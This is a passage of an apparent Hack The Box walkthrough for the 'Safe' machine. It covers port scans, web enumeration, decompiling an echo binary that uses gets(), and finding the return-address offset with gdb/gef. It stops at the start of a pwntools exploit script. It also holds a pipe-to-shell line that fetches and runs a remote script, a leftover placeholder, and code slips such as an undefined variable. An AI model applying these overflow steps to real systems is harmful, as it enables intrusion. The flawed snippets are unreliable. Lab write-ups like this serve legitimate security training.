+ Increasing send delay for 10.10.10.147 from 10 to 20 due to max_successful_tryno increase to 5
+ Completed Connect Scan at 16:11, 147.37s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.147
+ Host is up, received syn-ack (0.095s latency).
+ Scanned at 2020-02-15 16:08:45 GMT for 148s
+ Not shown: 8317 closed ports
+ Reason: 8317 conn-refused
+ PORT STATE SERVICE REASON
+ 22/tcp open ssh syn-ack
+ 80/tcp open http syn-ack
+ 1337/tcp open waste syn-ack
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 147.55 seconds
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nmap -sCV -p22,80,1337 10.10.10.147
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 16:11 GMT
+ Nmap scan report for 10.10.10.147
+ Host is up (0.096s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
+ | 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
+ |_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Apache2 Debian Default Page: It works
+ 1337/tcp open waste?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP:
+ | 10:13:12 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ | DNSVersionBindReqTCP:
+ | 10:13:07 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | GenericLines:
+ | 10:12:55 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back?
+ | GetRequest:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? GET / HTTP/1.0
+ | HTTPOptions:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? OPTIONS / HTTP/1.0
+ | Help:
+ | 10:13:17 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? HELP
+ | NULL:
+ | 10:12:55 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | RPCCheck:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | RTSPRequest:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? OPTIONS / RTSP/1.0
+ | SSLSessionReq, TLSSessionReq, TerminalServerCookie:
+ | 10:13:18 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ |_ What do you want me to echo back?
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port1337-TCP:V=7.80%I=7%D=2/15%Time=5E481843%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,3E,"\x2010:12:55\x20up\x203\x20min,\x20\x200\x20users,\x20\x20load\x
+ SF:20average:\x200\.00,\x200\.02,\x200\.00\n")%r(GenericLines,63,"\x2010:1
+ SF:2:55\x20up\x203\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200
+ SF:\.00,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20ec
+ SF:ho\x20back\?\x20\r\n")%r(GetRequest,71,"\x2010:13:02\x20up\x203\x20min,
+ SF:\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.0
+ SF:0\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20GET\x20
+ SF:/\x20HTTP/1\.0\r\n")%r(HTTPOptions,75,"\x2010:13:02\x20up\x203\x20min,\
+ SF:x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00
+ SF:\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIONS\
+ SF:x20/\x20HTTP/1\.0\r\n")%r(RTSPRequest,75,"\x2010:13:02\x20up\x203\x20mi
+ SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\
+ SF:.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIO
+ SF:NS\x20/\x20RTSP/1\.0\r\n")%r(RPCCheck,3E,"\x2010:13:02\x20up\x203\x20mi
+ SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\
+ SF:.00\n")%r(DNSVersionBindReqTCP,3E,"\x2010:13:07\x20up\x203\x20min,\x20\
+ SF:x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n")
+ SF:%r(DNSStatusRequestTCP,3E,"\x2010:13:12\x20up\x204\x20min,\x20\x200\x20
+ SF:users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n")%r(Help,
+ SF:67,"\x2010:13:17\x20up\x204\x20min,\x20\x200\x20users,\x20\x20load\x20a
+ SF:verage:\x200\.00,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me
+ SF:\x20to\x20echo\x20back\?\x20HELP\r\n")%r(SSLSessionReq,64,"\x2010:13:18
+ SF:\x20up\x204\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00
+ SF:,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x
+ SF:20back\?\x20\x16\x03\n")%r(TerminalServerCookie,63,"\x2010:13:18\x20up\
+ SF:x204\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\
+ SF:.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\
+ SF:?\x20\x03\n")%r(TLSSessionReq,64,"\x2010:13:18\x20up\x204\x20min,\x20\x
+ SF:200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n\nW
+ SF:hat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20\x16\x03\n");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 95.74 seconds
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nikto -h http://10.10.10.147/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.147
+ + Target Hostname: 10.10.10.147
+ + Target Port: 80
+ + Start Time: 2020-02-15 16:33:18 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.25 (Debian)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + Server may leak inodes via ETags, header found with file /, inode: 2a23, size: 588c4cc4e54b5, mtime: gzip
+ + Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ + Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ + OSVDB-3092: /manual/: Web server manual found.
+ + OSVDB-3268: /manual/images/: Directory indexing found.
+ + OSVDB-3233: /icons/README: Apache default file found.
+ + 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ + End Time: 2020-02-15 16:46:54 (GMT0) (816 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+Let's run dirsearch to see which directories we can find :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → dirsearch -u http://10.10.10.147/ -e php,html,txt,js
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-16_08-32-43.log
+
+ Target: http://10.10.10.147/
+
+ [08:32:44] Starting:
+ [08:32:46] 403 - 298B - /.ht_wsr.txt
+ [08:32:46] 403 - 291B - /.hta
+ [08:32:46] 403 - 300B - /.htaccess-dev
+ [08:32:46] 403 - 302B - /.htaccess-local
+ [08:32:46] 403 - 302B - /.htaccess-marco
+ [08:32:46] 403 - 300B - /.htaccess.BAK
+ [08:32:46] 403 - 301B - /.htaccess.bak1
+ [08:32:46] 403 - 301B - /.htaccess.orig
+ [08:32:46] 403 - 300B - /.htaccess.old
+ [08:32:46] 403 - 303B - /.htaccess.sample
+ [08:32:46] 403 - 301B - /.htaccess.save
+ [08:32:46] 403 - 300B - /.htaccess.txt
+ [08:32:46] 403 - 302B - /.htaccess_extra
+ [08:32:46] 403 - 301B - /.htaccess_orig
+ [08:32:46] 403 - 299B - /.htaccess_sc
+ [08:32:46] 403 - 299B - /.htaccessBAK
+ [08:32:46] 403 - 300B - /.htaccessOLD2
+ [08:32:46] 403 - 299B - /.htaccessOLD
+ [08:32:46] 403 - 295B - /.htgroup
+ [08:32:46] 403 - 297B - /.htaccess~
+ [08:32:47] 403 - 300B - /.htpasswd-old
+ [08:32:47] 403 - 301B - /.htpasswd_test
+ [08:32:47] 403 - 297B - /.htpasswds
+ [08:32:47] 403 - 295B - /.htusers
+ [08:33:29] 200 - 11KB - /index.md
+ [08:33:34] 200 - 626B - /manual/index.md
+ [08:33:34] 301 - 313B - /manual -> http://10.10.10.147/manual/
+ [08:33:47] 403 - 300B - /server-status
+ [08:33:47] 403 - 301B - /server-status/
+
+ Task Completed
+
+
+Looking at the sourcecode of http://10.10.10.147 we see something commented out mentionning a binary named "myapp" running on port 1337.
+
+
+
+Let's first download the binary locally, at http://10.10.10.147/myapp
+
+
+
+Let's navigate to http://10.10.10.147:1337 to see it running.
+
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → ls
+ myapp
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → file myapp
+ myapp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fcbd5450d23673e92c8b716200762ca7d282c73a, not stripped
+
+
+Looks like we are looking at a Return Oriented Programming (ROP) binary challenge, which is a Buffer Overflow based challenge. let's fire up gdb on myapp to see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → chmod +x myapp
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → gdb ./myapp
+ GNU gdb (Debian 8.3.1-1) 8.3.1
+ Copyright (C) 2019 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ Reading symbols from ./myapp...
+ (No debugging symbols found in ./myapp)
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10840]
+ 08:58:30 up 15:20, 1 user, load average: 0.93, 0.87, 0.79
+
+ What do you want me to echo back? A
+ A
+ [Inferior 1 (process 10836) exited normally]
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10843]
+ 08:58:42 up 15:20, 1 user, load average: 0.86, 0.85, 0.78
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ [Inferior 1 (process 10842) exited normally]
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10849]
+ 08:59:03 up 15:20, 1 user, load average: 0.61, 0.80, 0.77
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+
+
+Basically we need 500 As to crash the program. let's see if it still crashes if we create a pattern. While we can continue in gdb-peda, for this example we'll proceed in Ghidra to illustrate what the binary does.
+
+
+ >unzip ghidra into /opt
+ >sudo /opt/ghidra_9.1.1_PUBLIC/ghidraRun
+ >Create project in /home/nihilist/_HTB/Safe/Ghidra/
+ >project name myapp > finish
+
+ >File > Import file > myapp
+ >analyze it
+ >select all
+ >analyze
+
+ >symbol tree
+ >functions
+ >main
+
+
+
+
+
+
+ undefined8 main(void)
+
+ {
+ char local_78 [112];
+
+ system("/usr/bin/uptime");
+ printf("\nWhat do you want me to echo back? ");
+ gets(local_78);
+ puts(local_78);
+ return 0;
+ }
+
+
+our main function here assigns a variable 112 bytes, which then executes system passing /usr/bin/uptime as that call, That is why we can see it run on port 1337, running uptime in our terminal shows up the same thing. Once it is done running the uptime binary, it does a **gets()** and a **puts()**
+
+From here we can see that if we put in more than 112 bytes, we will end up overflowing the buffer and getting overwrites
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → gdb -q myapp
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 76 commands loaded for GDB 8.3.1 using Python engine 3.7
+ [*] 4 commands could not be loaded, run `gef missing` to know why.
+ Reading symbols from myapp...
+ (No debugging symbols found in myapp)
+ gef➤ r
+
+
+back into gdb, we need gef's additional options to create patterns to identify what we can do with the buffer overflow.
+
+
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 13738]
+ 09:45:31 up 16:07, 1 user, load average: 1.14, 1.08, 1.10
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "AAAAAAAA"
+ $rbp : 0x4141414141414141 ("AAAAAAAA"?)
+ $rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0x81
+ $r9 : 0x4141414141414141 ("AAAAAAAA"?)
+ $r10 : 0x4141414141414141 ("AAAAAAAA"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe438│+0x0000: "AAAAAAAA" ← $rsp
+ 0x00007fffffffe440│+0x0008: 0x0000000000000000
+ 0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp"
+ 0x00007fffffffe450│+0x0018: 0x0000000100400000
+ 0x00007fffffffe458│+0x0020: 0x000000000040115f → <****main+0> push rbp
+ 0x00007fffffffe460│+0x0028: 0x0000000000000000
+ 0x00007fffffffe468│+0x0030: 0xad7b338534175b70
+ 0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4011a1 <****main+66> call 0x401030 <****puts@plt>
+ 0x4011a6 <****main+71> mov eax, 0x0
+ 0x4011ab <****main+76> leave
+ → 0x4011ac <****main+77> ret
+ [!] Cannot disassemble from $PC
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGSEGV
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4011ac → main()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+From there, we can see that putting in more than 112 bytes (in this example, 128 bytes) we are able to cause a segfault, However we need to see where exactly we crash. So we create a pattern, paste it in, and see where exactly do we crash
+
+
+ gef➤ pattern create 200
+ [+] Generating a pattern of 200 bytes
+ aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+ [+] Saved as '$_gef0'
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 13856]
+ 09:49:26 up 16:11, 1 user, load average: 1.01, 0.98, 1.05
+
+ What do you want me to echo back? aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+ aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
+ $rbp : 0x616161616161616f ("oaaaaaaa"?)
+ $rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0xc9
+ $r9 : 0x6161616161616176 ("vaaaaaaa"?)
+ $r10 : 0x6161616161616177 ("waaaaaaa"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe438│+0x0000: "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" ← $rsp
+ 0x00007fffffffe440│+0x0008: "qaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawa[...]"
+ 0x00007fffffffe448│+0x0010: "raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[...]"
+ 0x00007fffffffe450│+0x0018: "saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[...]"
+ 0x00007fffffffe458│+0x0020: "taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe460│+0x0028: "uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe468│+0x0030: "vaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe470│+0x0038: "waaaaaaaxaaaaaaayaaaaaaa"
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4011a1 <****main+66> call 0x401030 <****puts@plt>
+ 0x4011a6 <****main+71> mov eax, 0x0
+ 0x4011ab <****main+76> leave
+ → 0x4011ac <****main+77> ret
+ [!] Cannot disassemble from $PC
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGSEGV
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4011ac → main()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+In order to be more precise, let's use the registers function to see the details of our buffer overflow
+
+
+ gef➤ registers
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
+ $rbp : 0x616161616161616f ("oaaaaaaa"?)
+ $rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0xc9
+ $r9 : 0x6161616161616176 ("vaaaaaaa"?)
+ $r10 : 0x6161616161616177 ("waaaaaaa"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+
+ gef➤ pattern search $rsp
+ [+] Searching '$rsp'
+ [+] Found at offset 120 (little-endian search) likely
+ [+] Found at offset 113 (big-endian search)
+
+
+Looks like we have found our pattern at offset 120 (little-endian format) and at offset 113 (big-endian format) Let's hand-craft a pattern of 120 Xs, 8 Ys and 8 Zs
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → python -c 'print "X"*128 + "Y"*8 + "Z"*8'
+ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+
+
+and paste it in the binary to examine the registers
+
+
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 14017]
+ 09:56:05 up 16:17, 1 user, load average: 1.69, 1.21, 1.09
+
+ What do you want me to echo back? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+
+ gef➤ registers
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ"
+ $rbp : 0x5858585858585858 ("XXXXXXXX"?)
+ $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0x91
+ $r9 : 0x5858585858585858 ("XXXXXXXX"?)
+ $r10 : 0x5858585858585858 ("XXXXXXXX"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ gef➤
+
+
+So, if we can put a memory address where the Xs are, we can continue with the execution of the program. For example we can put the memory address of main so let's take a look back at ghidra, to see what the memory address of main is.
+
+
+
+Now we know that the main function is at the 0x40115f memory address. From there we can create a python script to interact with it a little further.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → nano exploit.py
+
+
+
+ #0x40115f - main
+ from pwn import *
+ context(terminal=['tmux','new-window'])
+ p = gdb.debug('./myapp','b main')
+ context(os='linux',arch='amd64')
+
+ junk = ("A" * 120).encode()
+ call_main = p64(0x40115f)
+
+ p.recvuntil('What do you want me to echo back ?')
+ p.sendline(j + call_main)
+
+
+
+ python3 exploit.py
+
+
+
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x0
+ $rdx : 0x0
+ $rsp : 0x00007fff98990520 → 0x0000000000000001
+ $rbp : 0x0
+ $rsi : 0x0
+ $rdi : 0x0
+ $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp
+ $r8 : 0x0
+ $r9 : 0x0
+ $r10 : 0x0
+ $r11 : 0x0
+ $r12 : 0x0
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
